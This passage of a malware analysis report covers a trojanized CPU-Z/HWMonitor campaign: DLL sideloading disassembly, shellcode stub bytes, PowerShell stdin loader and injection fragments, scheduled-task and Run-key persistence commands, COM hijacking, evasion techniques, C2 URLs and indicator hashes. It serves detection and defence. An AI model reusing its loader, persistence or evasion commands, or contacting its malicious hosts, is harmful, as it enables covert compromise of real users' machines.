.tls        0x1fb000         24        512    0.00    RW    (thread-local)
.reloc      0x1fc000    121,952    122,368    4.97    R     (relocations)

Critical observation: The .rdata section is 1.95 MB (94% of the DLL) — this is where the encoded shellcode payload is stored. The actual code in .text is only 11 KB.

Security features: ASLR (Dynamic Base) + DEP/NX + High Entropy ASLR enabled. No CFG.

Internal DLL name: proxy.dll (found in export directory metadata)

4.3.2 DllMain Execution Flow

The DLL’s entry point at RVA 0x1000 (_DllMainCRTStartup) immediately calls DllMain at RVA 0x1018. The full execution flow:

_DllMainCRTStartup (0x1000):
    call DllMain
    mov eax, 1          ; Always return TRUE
    ret

DllMain (0x1018):
    test edx, edx       ; Check fdwReason
    je  PROCESS_DETACH  ; edx=0 -> DLL_PROCESS_DETACH
    cmp edx, 1          ; edx=1 -> DLL_PROCESS_ATTACH
    jne EXIT

  DLL_PROCESS_ATTACH:
    ; 1. Save hModule handle to global
    mov [rip+0x1f80e8], rcx

    ; 2. GetCurrentThreadId() -> save for later thread suspension
    call GetCurrentThreadId
    mov [rip+0x1f80f8], eax

    ; 3. CreateThread -> Thread1 (thread function at 0x10c1)
    ;    This is the orchestrator thread
    lea  r8, [rip+0x72]     ; lpStartAddress = 0x10c1
    xor  ecx, ecx           ; lpThreadAttributes = NULL
    xor  edx, edx           ; dwStackSize = 0
    xor  r9d, r9d           ; dwCreationFlags = 0
    call CreateThread

    ; 4. Load the REAL CRYPTBASE.dll for function forwarding
    call LoadRealDll

    ; 5. Return TRUE (DLL loaded successfully)
    push 1
    pop  rax
    ret

Thread1 – Orchestrator (0x10c1):

Thread1:
    ; 1. Open the MAIN THREAD of CPU-Z with THREAD_SUSPEND_RESUME access
    mov  ecx, 2              ; dwDesiredAccess = THREAD_SUSPEND_RESUME
    mov  r8d, [saved_tid]    ; dwThreadId = main thread ID
    call OpenThread

    ; 2. SUSPEND the main thread (freeze CPU-Z while we work)
    call SuspendThread(main_thread_handle)

    ; 3. Create Thread2 - the actual payload executor
    lea  r8, [0x18000112d]   ; Thread2 function address
    call CreateThread

    ; 4. Wait for Thread2 to complete setup
    call WaitForThread

    ; 5. RESUME the main thread (CPU-Z continues normally)
    call ResumeThread(main_thread_handle)

    ret

Thread2 – Payload Executor (0x112d):

Thread2:
    sub  rsp, 0x998          ; Large 2,456-byte stack frame
    ; Save XMM6-XMM11 (SIMD registers for decoding)

    ; 1. Copy 0xA0 bytes of config from .rdata (RVA 0xee940)
    lea  rsi, [rip+0xed7bd]  ; Source: config area in .rdata
    lea  rdi, [rbp+0x7b8]    ; Destination: stack buffer
    mov  ecx, 0xa0            ; 160 bytes
    rep movsb

    ; 2. Decode the colon-separated hex payload from .rdata
    ;    (uses XMM registers for SIMD-accelerated hex decoding)

    ; 3. Execute decoded shellcode -> reflective PE loading

    ret

Summary of DllMain thread choreography:

cpuz_x64.exe (main thread)
    │
    ├──→ LoadLibrary("CRYPTBASE.dll")
    │        │
    │        ├── DllMain(DLL_PROCESS_ATTACH)
    │        │     ├── CreateThread → Thread1 (Orchestrator)
    │        │     │     ├── SuspendThread(main_thread)  ← FREEZE CPU-Z
    │        │     │     ├── CreateThread → Thread2 (Payload)
    │        │     │     │     ├── Decode .rdata payload (357 KB)
    │        │     │     │     ├── Execute shellcode
    │        │     │     │     └── Reflective load out.dll
    │        │     │     ├── Wait for Thread2
    │        │     │     └── ResumeThread(main_thread)   ← UNFREEZE CPU-Z
    │        │     └── LoadRealDll("C:\Windows\System32\CRYPTBASE.dll")
    │        │
    │        └── Returns TRUE
    │
    └──→ CPU-Z continues normally (all SystemFunction* calls forwarded)

4.3.3 Function Proxy Mechanism

The DLL exports the same 12 SystemFunction* functions as the legitimate CRYPTBASE.dll. Each export uses a lazy-loading proxy pattern:

SystemFunction001 (0x29e4):         ; Export ordinal 2
    xor  ecx, ecx                   ; index = 0
    call ResolveForward              ; Get real function address
    test rax, rax
    je   .fail
    jmp  rax                         ; TAIL CALL to real function

SystemFunction002 (0x2a83):
    push 1                           ; index = 1
    pop  rcx
    call ResolveForward
    ...jmp rax

SystemFunction003 (0x2ad1):
    push 2                           ; index = 2
    pop  rcx
    call ResolveForward
    ...jmp rax

ResolveForward (0x2a31) – lazy resolver:

ResolveForward:
    ; Check cache: function_cache[index]
    lea  rdi, [rip+0x1f8100]        ; Cache array base
    mov  rax, [rdi + rcx*8]          ; Check if already resolved
    test rax, rax
    jne  .cached                     ; Already resolved, return it

    ; First call: resolve from real DLL
    call LoadRealDll                 ; Ensure real CRYPTBASE.dll loaded
    mov  rcx, [real_dll_handle]      ; HMODULE of real CRYPTBASE.dll

    ; Function name table at 0xeec18 (relative offsets)
    lea  rax, [rip+0xeec18]         ; Name table base
    movsxd rdx, [rax + rsi*4]       ; Get relative offset for this index
    add  rdx, rax                    ; Absolute address of function name string

    call GetProcAddress(real_dll, function_name)
    mov  [rdi + rsi*8], rax          ; Cache the resolved address

.cached:
    ret                              ; RAX = real function address

Function name forwarding table at RVA 0xeec18:

Index	Function Name
0	SystemFunction001
1	SystemFunction002
2	SystemFunction003
3	SystemFunction004
4	SystemFunction005
5	SystemFunction028
6	SystemFunction029
7	SystemFunction034
8	SystemFunction036
9	SystemFunction040
10	SystemFunction041

Real DLL loading: Uses LoadLibraryExA("C:\Windows\System32\CRYPTBASE.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32) with the 0x800 flag to force loading from System32 even though a local DLL exists.

Note on sideloading target: cpuz_x64.exe does NOT directly import CRYPTBASE.dll. The sideloading is transitive — ADVAPI32.dll (which CPU-Z does import directly) has a dependency on CRYPTBASE.dll. When Windows resolves this transitive dependency, it checks the application directory first, finding the malicious DLL.

4.3.4 Embedded C2 Configuration

Two JSON configuration strings are embedded in the .rdata section:

Heartbeat template (at file offset 0xed90f):

{"hello":""}

C2 configuration (at file offset 0xed91d, RVA 0xee71d):

{"tag":"tbs","referrer":"cpz","callback":"https://welcome.supp0v3.com/d/callback"}

Field	Value	Meaning
tag	tbs	Campaign/build tag (possibly “the backdoor service”)
referrer	cpz	Delivery vector identifier (CPU-Z)
callback	https://welcome.supp0v3.com/d/callback	C2 callback URL

The tag and referrer fields allow the C2 server to track which campaign and delivery method compromised each victim. The utm_source=CityOfSin parameter seen in sandbox HTTP captures is appended at runtime.

4.3.5 Encoded Shellcode Payload

The .rdata section (1.95 MB) contains an encoded shellcode payload stored as colon-separated hex values in null-terminated chunks:

Encoding format:

[6 hex bytes]:[colon separator]...\x00[6 hex bytes]:....\x00
Example: "0f:b6:42:0b:45:03\x00b6:42:0c:45:03:c1\x00"

Payload statistics:

• Total colon characters: 298,804
• Colon data span: 2,041,760 bytes (nearly all of .rdata)
• Total encoded chunks: ~59,619
• Decoded payload size: 357,672 bytes (349.3 KB)
• Decoded payload entropy: 7.998 (encrypted)

The .rdata section also contains the DLL path string, function forwarding table, C2 config JSON, and PE metadata interleaved with the encoded payload data.

4.3.6 Reflective PE Loader (out.dll)

When decoded, the payload consists of two components:

1. Shellcode stub (offset 0x00, ~63 bytes):

0000: fc              cld                      ; Clear direction flag
0001: 48 83 e4 f0     and rsp, -0x10           ; Align stack to 16 bytes
0005: e8 00 00 00 00  call $+5                 ; PIC: get current address
000a: 58              pop rax                  ; RAX = address of this instruction
000b: 48 05 29 00 00  add rax, 0x29            ; RAX = &metadata (offset 0x33)
0011: 48 89 c1        mov rcx, rax             ; RCX = &metadata (arg1)
0014: 48 89 c2        mov rdx, rax
0017: 48 81 c2 0c 00  add rdx, 0x0C            ; RDX = &PE_base (offset 0x3F)
001e: 48 89 d3        mov rbx, rdx
0021: 48 81 c3 f4 11  add rbx, 0x11F4          ; RBX = reflective_loader (offset 0x1233)
0028: 48 83 ec 20     sub rsp, 0x20            ; Shadow space
002c: 48 ff d3        call rbx                 ; Call reflective loader

2. Metadata header (offset 0x33, 12 bytes):

Offset	Value	Meaning
0x33	0x00057E1C (359,964)	Total payload/image size
0x37	0x00000002	Section count or flags
0x3B	0x00057C00 (359,424)	Raw PE data size

3. Embedded PE “out.dll” (offset 0x3F+):

The MZ header is present at offset 0x40 with standard DOS stub (“This program cannot be run in DOS mode”). The PE contains:

• Internal name: out.dll
• Architecture: x86-64 (AMD64)
• Sections: .text$mn, .idata$5, .rdata, .rdata$voltmd, .xdata, .edata, .idata$2, .idata$3, .pdata
• Imports: GetLastError from KERNEL32.dll
• Reflective loader entry: at offset 0x1233 within the payload

The reflective loader at offset 0x1233 performs:

1. Parse the embedded PE headers manually
2. Allocate memory via VirtualAlloc
3. Map sections into memory
4. Process relocations
5. Resolve imports (KERNEL32.dll)
6. Execute the PE entry point

The bulk of out.dll is encrypted (entropy 7.998), with decryption performed by the reflective loader before mapping. This is the final stage payload that spawns PowerShell and establishes persistence.

Decoded payload saved locally: samples/decoded_payload.bin (357,672 bytes)

4.3.7 DLL Variant Comparison

Feature	Bundled DLL	Variant DLL
SHA256	496850188...	9cdabd70f...
Size	2,179,584 (2.08 MB)	1,256,960 (1.20 MB)
Sections	7 (with .buildid, .tls)	5 (no .buildid, .tls)
Imphash	76ef47c1...	7f3aa71d...
.rdata size	2,041,856	1,196,544
Imports ntdll	NtAllocate/FreeVirtualMemory	NtAllocate/FreeVirtualMemory
Extra imports	AcquireSRWLockExclusive, ResumeThread, RtlWaitOnAddress	MessageBoxA (USER32)
TLS directory	Yes (empty)	No
Error strings	“thread panic:”	“OpenThread failed”, “panic:”
Exports	19 (12 functions + 7 TLS-related)	13 (12 functions + _DllMainCRTStartup)
VT Detection	31/77	31/76

The variant is a smaller, slightly earlier build — it lacks TLS support, has fewer exports, includes MessageBoxA (possibly for debug/error display), and has an explicit “OpenThread failed” error string. The bundled version is more refined with TLS support, SRW locks (for thread-safe operation), and the .buildid section.

Both share the same core architecture: Zig-compiled proxy DLL with colon-hex encoded shellcode in .rdata.

---

4.4 Stage 2 – C2 Callback and Payload Delivery

Verified by sandbox HTTP ordering: The C2 callback is the first network action after the legitimate CPU-Z version check. The DLL’s reflective-loaded out.dll performs:

1. DNS-over-HTTPS resolution: GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A
2. C2 callback: POST https://welcome.supp0v3.com/d/callback with campaign config {"tag":"tbs","referrer":"cpz","callback":"..."}
3. C2 response: 200 OK, Content-Type: application/json, Content-Length: 55 (via 1.1 Caddy backend)
4. The 55-byte JSON response contains instructions or next-stage code delivery coordinates

The C2 delivers the full backdoor payload to the PowerShell stage. This is confirmed by the file write ordering in CAPE sandbox: no persistence files are written until AFTER the C2 response is received.

4.5 Stage 3 – PowerShell Loader

The DLL spawns PowerShell with a carefully crafted command line that reads code from stdin rather than command-line arguments, evading command-line logging:

powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"

The PowerShell code piped via stdin contains heavily obfuscated functions using business-themed variable names as camouflage:

function New-DelegateType {
    # Compliance validation checkpoint
    param(
        [Type[]]$marketManager = @(),
        # Security framework initialization
        [Type]$marketProvider = [Void]
        # Performance monitoring hook
    )
    $customerAgent = [AppDomain]::CurrentDomain
    # Enterprise policy enforcement
    $accountHandler = New-Object System.Reflection.AssemblyName('DynamicDelegate')
    # Audit trail generation
    $customerHandler = $customerAgent.DefineDynamicAssembly(...)
    ...
}

This function creates dynamic .NET delegates at runtime for API calls – a technique for bypassing AMSI and calling native Windows APIs from PowerShell.

A second key function, Invoke-JIT, performs shellcode execution:

function Invoke-JIT {
    param(
        [byte[]]$contentBuffer,
        [int]$customerController = 0,
        [byte[]]$customerProvider = @(0,0,0,0)
    )
    $systemHandle = [NtApi]::GetCurrentProcess()
    [IntPtr]$dataHandle = [IntPtr]::Zero
    [UInt32]$codeSize = [UInt32]$contentBuffer.Length
    $revenueAgent = [NtApi]::NtAllocateVirtualMemory(
        $systemHandle,
        [ref]$dataHandle,
        [UIntPtr]::Zero,
        ...
    )
    ...
}

This allocates executable memory via NtAllocateVirtualMemory and runs shellcode – a classic reflective injection pattern.

4.6 Stage 4 – In-Memory C# Compilation (csc.exe)

The PowerShell stage triggers the .NET C# compiler (csc.exe) to compile code in-memory:

csc.exe /noconfig /fullpaths @"C:\Users\<USER>\AppData\Local\Temp\ktc155gm\ktc155gm.cmdline"

This generates a temporary DLL (ktc155gm.dll) and supporting files, which are then loaded into the PowerShell process. The cvtres.exe resource compiler is also invoked, indicating resource embedding.

MSBuild project files are dropped for persistence:

• C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj – Main persistence project
• C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj – Secondary persistence project

These .proj files contain inline C# tasks that execute malicious code when MSBuild processes them – a well-known Living-off-the-Land Binary (LOLBin) technique.

4.7 Stage 5 – Persistence Mechanisms

The malware establishes four independent persistence mechanisms:

4.7.1 Registry Run Key (MSBuild)

Key:   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea36ba52-31af-5d88-c3d633
Value: powershell -WindowStyle hidden -Command C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\Bruno\AppData\Local\Microsoft\MSBuild\c_3791.proj

Runs on every user logon. Uses PowerShell in hidden mode to invoke MSBuild with the malicious project file. The Run key name uses a GUID-like random string.

Across sandbox runs, different random key names were observed:

• ea36ba52-31af-5d88-c3d633
• 839dc7dc-0ec0-5294-cff01f
• 5637d46b-ca04-57c0-7a9858
• 1d5a637c-f015-550a-7a0c4b
• 7ffc4070-ca40-54a1-046add

4.7.2 Scheduled Task

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' `
  -Argument '-WindowStyle Hidden -Command "& C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\Bruno\AppData\Local\Packages\MSBuild\CommonBuild.proj"'
$PeriodicTrigger = New-ScheduledTaskTrigger -Once -At (Get-Date) `
  -RepetitionInterval (New-TimeSpan -Minutes 68) `
  -RepetitionDuration (New-TimeSpan -Days (365 * 20))
$LogonTrigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME
$Settings = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -StartWhenAvailable
$Principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest

Triggers:

• Every 68 minutes (unusual interval to avoid pattern detection)
• At user logon
• Duration: 20 years (effectively permanent)
• Runs with Highest privileges, hidden window

4.7.3 COM Hijacking (TypeLib -> ActiveX.sct -> Clippy.sct -> Moniker.dll)

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\(Default)
  = script:C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)
  = script:C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct

This hijacks the IScriptControl TypeLib GUID to execute a SCT scriptlet (ActiveX.sct) whenever any application attempts to use the IScriptControl COM object.

4.7.4 PowerShell Profile Autorun

Key:   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\profile
Value: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Bruno\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1

Drops and registers a PowerShell autorun script with execution policy bypass.

4.8 Evasion Techniques

Technique	Detail
DLL Sideloading	Uses legitimate signed CPU-Z binary as host; transitive load via ADVAPI32
Zig-compiled DLL	Uncommon compiler avoids signature-based detection of C/C++ toolchains
Colon-hex encoding	349KB payload encoded as colon-separated hex in .rdata (e.g. b6:42:0b:45:03:c1)
Reflective PE loading	out.dll reflective-loaded via Stephen Fewer-style loader with ROR13 API hashing
XXTEA encryption	out.dll’s internal payload encrypted with Corrected Block TEA (128-bit key, delta 0x9E3779B9)
DEFLATE compression	XXTEA-decrypted data further compressed with raw DEFLATE (custom inflate impl in .rdata)
Dual-hash API resolution	Reflective loader uses ROR13; out.dll uses ROR14 — complicates single-signature detection
Custom DllMain reason code	out.dll only activates on fdwReason=0x0A (canary), ignores normal DLL_PROCESS_ATTACH
Thread suspension	Suspends main CPU-Z thread during injection, resumes after — avoids race conditions
Stdin piping	PowerShell code delivered via stdin ([Console]::In.ReadToEnd()), not command-line args
Business-themed obfuscation	Variables named $marketManager, $customerAgent, $revenueAgent
IPv6-encoded .NET assembly	Moniker.dll encoded as IPv6 address array in Clippy.sct
BinaryFormatter deserialization	.NET assembly loaded via deserialization gadget chain, avoids Assembly.Loaddetection
Anti-debug	Checks for debug environment (DETECT_DEBUG_ENVIRONMENT tag)
Anti-sandbox	BIOS checks, memory checks, long sleeps; Zenbox classified as CLEAN (evasion success)
Self-deletion	Removes traces after execution
DNS-over-HTTPS	Bypasses DNS monitoring for C2 resolution via Cloudflare 1.1.1.1
Cloudflare fronting	C2 behind Cloudflare CDN (shared IPs); backend is Caddy reverse proxy
C2-delivered backdoor	Persistence components not in the DLL — fetched from C2 at runtime
LOLBins	MSBuild, PowerShell, csc.exe, cvtres.exe, regsvr32.exe, scrobj.dll
XOR-encrypted shellcode	BuildCache.dat encrypted with rolling key 1+(i%17)
In-memory compilation	C# compiled at runtime by csc.exe, loaded as .NET DLL
Proxy DLL exports	Lazy-loading forwarding to real C:\Windows\System32\CRYPTBASE.dll
Randomized persistence names	GUID-like registry Run key names change per execution
Multiple persistence paths	4 independent mechanisms — surviving removal of any single one
Mutex	Unique mutex per instance (Local\3ecd29ec-86b0-5c3c-40af48)

---

5. Command & Control Infrastructure

5.1 C2 Domain

Property	Value
Domain	supp0v3.com
Subdomain	welcome.supp0v3.com
Registered	2025-10-29
Expires	2026-10-29
Registrar	Privacy-protected (ordertld.com)
Nameservers	rodney.ns.cloudflare.com, emily.ns.cloudflare.com
VT Detection	10/94 malicious
Categories	Malware, Spyware, Known Infection Source

5.2 DNS-over-HTTPS Resolution

GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A
Host: 1.1.1.1
Accept: application/dns-json

Uses Cloudflare’s public DoH resolver to bypass enterprise DNS monitoring and NIDS.

5.3 C2 Callback Protocol

Endpoint: POST https://welcome.supp0v3.com/d/callback

Response headers (from C2AE sandbox):

Server: cloudflare
via: 1.1 Caddy
Content-Type: application/json
Content-Length: 55
access-control-allow-origin: *
access-control-allow-headers: *
cf-cache-status: DYNAMIC

The via: 1.1 Caddy header reveals the C2 backend uses a Caddy web server behind Cloudflare.

5.4 Infrastructure Details

C2 URL: https://welcome.supp0v3.com/ – 20/95 malicious on VT

IP Address	Purpose	Notes
104.21.63.112	C2 (welcome.supp0v3.com)	Cloudflare CDN
172.67.145.101	C2 (welcome.supp0v3.com)	Cloudflare CDN
195.154.81.43	Legitimate (download.cpuid.com)	Online.net / Scaleway
1.1.1.1	DNS-over-HTTPS resolver	Cloudflare DNS
104.18.20.213	CRL check (r12.c.lencr.org)	Let’s Encrypt
104.18.21.213	CRL check (r12.c.lencr.org)	Let’s Encrypt
162.159.36.2	Cloudflare	DNS/CDN infrastructure
23.11.33.159	DigiCert CRL (Akamai)	Certificate validation
23.200.156.138	Akamai CDN	Certificate validation
23.200.156.146	Akamai CDN	Certificate validation

TLS Certificate (C2):

Subject:  CN=supp0v3.com
Issuer:   CN=WE1, O=Google Trust Services, C=US
Serial:   00c84335271751f130118159ec1cebe9fc
JA3:      3b5074b1b5d032e5620f69f9f700ff0e
JA3S:     466556e923186364e82cbdb4cad8df2c
JA4:      t12d210700_76e208dd3e22_2dae41c691ec

---

6. Indicators of Compromise (IOCs)

6.1 File Hashes

Primary Package (CPU-Z ZIP)

Property	Value
SHA256	eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46
SHA1	b3dda9b61f0d7dfadbd23a206cb5d4f06d4eb96b
MD5	fed973c1f9ef2461a45e956fbbdf8ea9
SSDEEP	98304:towHq8jJTsBta+056pchCmj/9GNbvgpuJz5SBUvnxY0ZG4yf29PRog:nljJjh6mgmjkNiOz5S+vne0INf29PRX
VT	View

CRYPTBASE.dll Variants (DLL Sideloading Payload)

SHA256	File	Det	VT
49685018878b9a65ced16730a1842281175476ee5c475f608cadf1cdcc2d9524	CRYPTBASE.dll (CPU-Z bundled, imphash:76ef47c1)	31/77	View
9cdabd70f50dc8c03f0dfb31894d9d5265134a2cf07656ce8ad540c1790fc984	CRYPTBASE.dll (variant, imphash:7f3aa71d)	31/76	View
8a6c39f97fb86a4ff9dc9226fa8b3445c5fe123abab532ea6afb9be2608780e1	CRYPTBASE.dll v1 (early, 2025-12-13)	37/76	View
b63aa4a754ba2b82811905805822ea7f8c2be44d0d0c12e491237d7f8391ff58	CRYPTBASE.dll (powerMAX build)	—	View
aec12d6547e34206a72107c90e68db4e4f2cddee77d95480ec67e0fdd2fd5e7a	CRYPTBASE.dll (HWMonitor 1.63)	29/77	View
a6afdcc64e697c013ded61d1e1dff950884ac162323a217e04d1b4d0a24bde07	CRYPTBASE.dll (HWMonitor 1.63 v2)	23/77	View
98e0f9c8f5342c1924b30e8fc694be0a1c9870fa42a5dde1a2abfb32e8e10ab3	CRYPTBASE.dll (HWMonitor Pro 1.57)	20/77	View
cd7385e7efb41f53002710f4efcedb2c05c4c9f7a2d1a53b6c5ab6be2c26d4f5	CRYPTBASE.dll (PerfMonitor 2)	25/77	View
0d5578b212c64d91772a85fd7bf42d23bfb7ab0925be5bea6e72e07ba48dc5c8	CRYPTBASE.dll (CPU-Z “CRYPT” build)	24/77	View
74b5d631cc6802a5790f99a4bfefd9b3dfcfb43007f9fc576f7dfd4eac69d52e	CRYPTBASE.dll (MEXC exchange, 34KB)	20/76	View

version.dll Variants (FileZilla DLL Sideloading)

SHA256	File	Det	VT
e4c6f8ee8c946c6bd7873274e6ed9e41dec97e05890fa99c73f4309b60fd3da4	version.dll (FileZilla 3.69.5)	50/76	View
c3f74b948b902cc641da83fe6535133894ed979a73068e4937c633c9a661e3ce	version.dll (unknown target)	41/76	View

Trojanized ZIP Packages

SHA256	File	Det	VT
eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46	cpu-z_2.19-en.zip	22/77	View
9932fa8d24b3e9a1e39a722fe6e34e75cdd3feb51fcdab67d636d95b4f068935	cpu-z_2.19-en.zip (v2)	15/77	View
cfbd87ba199717d907d8c360587fc4704b7813fd4d2cd3829981076319099fcb	cpu-z.zip / cpu-z_2.19.zip	15/77	View
f8b09fa8c015f15e37c0469b01913a24aaf9e1aaac1afa13364e09b96b53c871	cpu-z_2.19-en.zip (v3)	22/77	View
3d91f442ddc055e15a7e4e8f7f30da43918ce3e12efad69e31e0e0b66be42a91	hwmonitor_1.63.zip (trojanized)	15/77	View
a2bea0e6b5e5500b4a26eeabb4a28a643a25bc13b20e5a4b35ca8e48a2e6d88f	hwmonitor-pro_1.57.zip	14/77	View
e0541fb863142ed515f2e76a2f93babc3b9cf3af1b6d12be57f16a665b4f6406	perfmonitor-2_2.04.zip	14/77	View
d3bb52e52cb1511da7ee2991a5959004db9e9551280dc80afe90b79ebc5e99c8	powermax_1.00 (with PDF lure)	14/77	View
665cca285680df321b63ad5106b167db9169afe30c17d349d80682837edcc755	FileZilla_3.69.5_win64.zip	38/77	View

Inno Setup Installer (Redirect Payload)

SHA256	File	Det	VT
eefc0f986dd3ea376a4a54f80ce0dc3e6491165aefdd7d5d6005da3892ce248f	HWiNFO_Monitor_Setup.exe	33/77	View
66ad4aaf260a5173d8eaa14db52629fd361add8b772f6a4bcc5c10328f0cc3c0	HWMonitorPro_1.57_Setup.exe	22/77	View
58814edae4c0adad75f48092c4c2d312901e8a8b6d6aec5ca724c33ca37a5311	PerfMonitor2_Setup.exe	15/77	View

C2-Delivered Persistence Components

SHA256	File	Det	VT
1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271	CommonBuild.proj / c_3791.proj	0/77	View
0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448	ActiveX.sct	0/77	View
02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703	Clippy.sct	0/77	View
3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d	Moniker.dll (extracted from Clippy.sct)	—	—

BuildCache.dat / data.dat (Final Stage Shellcode)

SHA256	Size	First Seen	Det	VT
d4ac7b02f1472f4f15a981a2a7ec89e9f35e2e15d9564ad679ac339d0968390e	760,907 B	2026-04-09	0/77	View
2fe5443d785667344916f4d4684db0666820cd45b7ed4eb3f2e389600bfd2480	732,235 B	2026-03-20	0/77	View
b2c45a026a115e60b5908a1f8474ff4acc6e14a64308996e00d16c7c11665216	710,731 B	2025-12-07	0/77	View

VBA Macro Component (Phishing Vector)

SHA256	Size	Det	VT
1c76af3a9097f50384345237140df78e8b456e4165b0270fdc3a1414413dc64e	14,776 B	8/76	View

.url Exploit Files (Earlier Campaign, Same Infrastructure)

SHA256	File	VT
715330cdb252f972dd073184baef526ade7bf0bdae00eaf3cd51668618c005dd	LibreOffice_25.8.4_Win_x86-64.msi.url	View
cf0d0b2fd29bf959838dc4af0223d47c5db58195b3d9d1c33dedbf75066631b0	GoogleDriveSetup.url	View

6.2 Network Indicators

Domains

Domain	Type	Description
supp0v3.com	C2	Command and control base domain
welcome.supp0v3.com	C2	Active C2 callback subdomain (behind Cloudflare)
helloworld.supp0v3.com	C2 test	Testing subdomain (behind Cloudflare, first seen 2025-11-17)
ai.supp0v3.com	Backend	Real backend -> 147.45.178.61 (NOT Cloudflare)
pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev	Distribution	Main Cloudflare R2 malware hosting bucket
pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev	Distribution	Secondary R2 bucket
pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev	Distribution	Tertiary R2 bucket

URLs

C2 endpoints:

URL	Method	Description
https://welcome.supp0v3.com/d/callback	POST	C2 callback endpoint
https://welcome.supp0v3.com/d/callback?utm_tag=snip&utm_source=CityOfSin	POST	C2 callback with campaign tracking
https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A	GET	DoH DNS resolution

Cloudflare R2 malware distribution URLs (redirect targets from compromised cpuid.com):

URL	Product
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/cpu-z_2.19-en.zip	CPU-Z
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor_1.63.zip	HWMonitor
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor/HWiNFO_Monitor_Setup.exe	HWMonitor (Inno Setup)
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor-pro/hwmonitor-pro_1.57.zip	HWMonitor Pro
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor-pro/HWMonitorPro_1.57_Setup.exe	HWMonitor Pro (Inno Setup)
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/perfmonitor/perfmonitor-2_2.04.zip	PerfMonitor 2
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/perfmonitor/PerfMonitor2_Setup.exe	PerfMonitor 2 (Inno Setup)
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/powermax/powermax_1.00.zip	powerMAX
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/powermax/powermax.exe	powerMAX (Inno Setup)
https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/cpu-z_2.19-en.zip	CPU-Z (secondary)
https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/hwmonitor_1.63.zip	HWMonitor (secondary)
https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/cpu-z.zip	CPU-Z (tertiary)
https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/hwmonitor_1.63.zip	HWMonitor (tertiary)

Earlier campaign (.url exploit WebDAV):

URL	Target
file://147.45.178.61@80/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs	LibreOffice CVE-2023-36025
file://147.45.178.61@80/file/GoogleDriveSetup.vbs	Google Drive CVE-2023-36025

IP Addresses (C2-related)

IP	Description
104.21.63.112	C2 (Cloudflare CDN for welcome.supp0v3.com)
172.67.145.101	C2 (Cloudflare CDN for welcome.supp0v3.com)
147.45.178.61	Download/staging server (ai.supp0v3.com) — AS215540 GCS LLP, Frankfurt DE; WebDAV for .url exploits; fake VK.com TLS cert
95.216.51.236	STX RAT C2 server (Hetzner Online GmbH, Finland) — confirmed by eSentire + our FileZilla DLL contacts this IP

C2 Subdomains (supp0v3.com)

Subdomain	First Seen	IP	Purpose
ai.supp0v3.com	2025-10-29	147.45.178.61	Development/staging (bare IP)
helloworld.supp0v3.com	2025-11-17	104.21.63.112	Testing (Cloudflare)
welcome.supp0v3.com	2025-12-11	104.21.63.112	Production C2 (Cloudflare)
elcome.supp0v3.com	2026-04-08	—	Typo/DNS probe

TLS Fingerprints

Type	Value	Context
JA3	3b5074b1b5d032e5620f69f9f700ff0e	C2 client TLS fingerprint
JA3S	466556e923186364e82cbdb4cad8df2c	C2 server TLS fingerprint
JA4	t12d210700_76e208dd3e22_2dae41c691ec	C2 client JA4 fingerprint
JA3	a0e9f5d64349fb13191bc781f81f42e1	CPUID.com connection
JA3	c12f54a3f91dc7bafd92cb59fe009a35	DoH resolver connection

6.3 Host-Based Indicators

File System Artifacts

Persistence files (C2-delivered):

C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj                       <- MSBuild C# shellcode loader
C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj                   <- MSBuild C# shellcode loader (copy)
